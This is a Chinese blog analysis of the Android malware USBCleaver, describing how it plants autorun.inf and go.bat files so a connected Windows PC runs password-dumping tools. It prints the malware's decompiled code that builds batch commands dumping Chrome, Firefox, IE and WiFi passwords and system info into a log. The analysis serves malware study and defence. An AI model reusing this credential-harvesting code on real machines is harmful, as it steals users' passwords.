本文章由Jack_Jia编写，转载请注明出处。  
文章链接：http://blog.csdn.net/jiazhijun/article/details/9179749

作者：Jack_Jia    邮箱： 309zhijun@163.com

一、病毒样本基本信息

二、病毒代码分析

1、查看AndroidMainfest.xml文件

由清单文件可以看出，该恶意软件的入口点只有一个.USBCleaverActivity。

2、代码分析流程

代码树结构如下：

经过对程序唯一入口点的分析，恶意代码工作流程如下：

1、点击程序图标后运行USBCleaverActivity组件，该组件主要负责病毒运行环境的创建，如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入（当以USB设备连接PC时，PC根据该文件配置运行go.bat），通过downloader完成对PC木马的下载。

2、downloader类负责PC木马压缩包的下载，下载后通过decompress完成PC木马压缩包解压

下载的PC木马压缩包信息如下：

3、payload通过payloadHandler产生go.bat，go.bat文件在autorun.info中配置运行。

  public String dumpChromePassword(){this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +         [Dump Chrome PW]         + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpChromePassword;}public String dumpFFPassword(){this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho +         [Dump Firefox PW]        + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe  /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpFFPassword;}public String dumpIEPassword(){this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +           [Dump IE PW]           + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpIEPassword;}public String dumpSysInfo(){this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +          [System info]           + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";return this.dumpSysInfo;}public String dumpWifiPassword(){this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO +          [Dump WIFI PW]          + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log%  >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";return this.dumpWifiPassword;}

go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后，PC木马即可成功运行。

http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99

http://news.ccidnet.com/art/1032/20130625/5029495_1.html

【Android病毒分析报告】 - Usbcleaver相关推荐

1. 【Android病毒分析报告】 - ZxtdPay 吸费恶魔

   本文章由Jack_Jia编写,转载请注明出处.   文章链接:http://blog.csdn.net/jiazhijun/article/details/11581543 作者:Jack_Jia   ...

2. 【Android病毒分析报告】 - KorBankDemon “吸金幽灵”打劫银行

   本文章由Jack_Jia编写,转载请注明出处.   文章链接:http://blog.csdn.net/jiazhijun/article/details/12112733 作者:Jack_Jia   ...

3. android.troj.opfake.a病毒,FakeMsdMiner挖矿病毒分析报告

   原标题:FakeMsdMiner挖矿病毒分析报告 近日,亚信安全截获新型挖矿病毒FakeMsdMiner,该病毒利用永恒之蓝,永恒浪漫等NSA漏洞进行攻击传播.该病毒具有远控功能,可以获取系统敏感信息 ...

4. 病毒分析报告-熊猫烧香

   分析报告 样本名 Worm.Win32.Fujack.p 时间 2017-5-27 平台 Windows 10 病毒分析报告 目录 1．样本概况    3 1.1 样本信息    3 1.2 测试环境 ...

5. Morto蠕虫病毒分析报告

   文章目录 样本信息 病毒现场复现 分析过程 Loader部分 Payload部分 病毒查杀 样本信息 名称:cache.txt SHA1:a5f83e3baae0df2cdcf5b7e9e862705 ...

6. Virut.ce-感染型病毒分析报告

   1.样本概况 病毒名称 Virus.Win32.Virut.ce MD5 6A500B42FC27CC5546079138370C492F 文件大小 131 KB (134,144 字节) 壳信息 无 ...

7. 关于“WireX Botnet”事件Android样本分析报告

   WireX家族病毒基本上都会在内部硬编码存放两个URL地址(部分变种的URL经过加密),变种A在内部硬编码了如下两个URL http://u.*******.store/?utm_source=tfi ...

8. c语言写骷髅病毒源码,骷髅病毒分析报告

   一:目录 1.样本信息 2.行为分析 3.样本分析 4.详细分析 二:样本信息 1.样本名称:样本.exe(脱壳后为样本dump.exe) 2.md5:5b8bc92296c2fa60fecc6316 ...

9. 【安卓病毒分析报告】FakeBank-盗取韩国银行信息的手机病毒

   FakeBank 文件信息 病毒恶意行为 该病毒运行后弹出设备管理器激活界面,图标隐藏,电话薄联系人列表截取,SMS发送及收件箱所有信息拦截,干扰通话,下载恶性伪装韩国银行软件,利用漏洞设备管理器激活 ...

最新文章

1. 注册HttpSessionListener失效原因
2. thinkphp F方法
3. java之RSA和Base64加密帮助类
4. MMKV集成与原理，赶紧学起来
5. 如何关闭借呗订阅开通通知_支付宝花呗借呗隐藏规则，芝麻分600以上，花呗3.6万，借呗12万！...
6. 抗锯齿 文字_PS之使用文字工具
7. 枚举、位操作 CLR学习第十二课
8. 奇异值分解 本质矩阵_Singular Value Decomposition（奇异值分解）
9. 干货｜在美国不要读博的12条理由
10. load data infile mysql_mysql Load Data InFile 的用法举例
11. python几种数据结构_Python中的4种数据结构
12. iOS 游戏开发教程资源
13. jdk32位安装包下载_premiere pro 2017 软件下载及安装教程
14. Python生成Wifi二维码 一键联网
15. word的大纲视图用法你晓得了吗
16. Android手机SD卡分区
17. 玩转Fasttext
18. html图片上传java_PhoneGap 上传图片HTML和服务器端端实现(JAVA)
19. 题解 luoguP2928 【[USACO09HOL]牛的打手Cattle Bruisers】
20. YOLOv5的项目实践 | 手势识别项目落地全过程（附源码）

热门文章

1. 批量修改Word属性工具使用教程
2. iphone手机里的计算机没有了怎么办,苹果手机app怎么在电脑上使用不了怎么办
3. python思想读后感_我的《Python核心编程》读后感
4. 为什么写技术博客对新人如此重要？
5. 关于hive自定义JsonSerde处理json
6. JavaScript简餐——初见Promise
7. php动态字体,利用纯CSS实现动态的文字效果实例
8. 构建前端团队的私有npm仓库
9. 类与对象——python基础datawhale组队学习
10. EDM邮件营销内容策略技巧